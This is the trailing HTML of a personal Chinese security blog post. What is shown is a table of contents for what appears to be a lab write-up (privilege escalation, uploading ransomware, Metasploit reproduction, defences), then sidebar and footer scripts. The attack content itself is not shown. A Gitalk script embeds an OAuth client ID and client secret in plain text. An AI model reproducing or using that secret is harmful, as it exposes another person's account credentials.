href="#3-1-%E5%AE%9E%E9%AA%8C%E5%87%86%E5%A4%87"><span class="nav-text">3.1 实验准备</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-%E5%AE%9E%E9%AA%8C%E8%BF%87%E7%A8%8B"><span class="nav-text">3.2 实验过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-1-%E6%8F%90%E6%9D%83"><span class="nav-text">3.2.1 提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-2-%E4%B8%8A%E4%BC%A0%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92"><span class="nav-text">3.2.2 上传勒索病毒</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-MSF%E5%A4%8D%E7%8E%B0"><span class="nav-text">4. MSF复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-text">4.1 环境配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-%E5%A4%8D%E7%8E%B0%E5%87%86%E5%A4%87"><span class="nav-text">4.2 复现准备</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-3-%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="nav-text">4.3 复现过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="nav-text">5. 防御措施</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="v5le0n9"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">v5le0n9</p>
  <div class="site-description" itemprop="description">小呀小二郎呀背着个书包上学堂</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">69</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/Leong_Vinson" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;Leong_Vinson" rel="noopener" target="_blank"><i class="fab fa-cuttlefish fa-fw"></i>CSDN</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://github.com/v5le0n9" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;v5le0n9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:v5le0n9@163.com" title="E-Mail → mailto:v5le0n9@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.zz1syyd.com/" title="https:&#x2F;&#x2F;www.zz1syyd.com&#x2F;" rel="noopener" target="_blank">zz1syyd</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://one-null-pointer.github.io/" title="https:&#x2F;&#x2F;one-null-pointer.github.io&#x2F;" rel="noopener" target="_blank">liaoyue</a>
        </li>
    </ul>
  </div>

      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">v5le0n9</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.4m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">20:40</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
          load: ['[tex]/mhchem'],
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
          packages: {'[+]': ['mhchem']},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '7c58e80079a2457b610d',
      clientSecret: 'fc16b1b0fdfb278016ebe41c20f3743c3c927466',
      repo        : 'comments.github.io',
      owner       : 'v5le0n9',
      admin       : ['v5le0n9'],
      id          : '75a6577edad05e6229fec2b8c2386d67',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
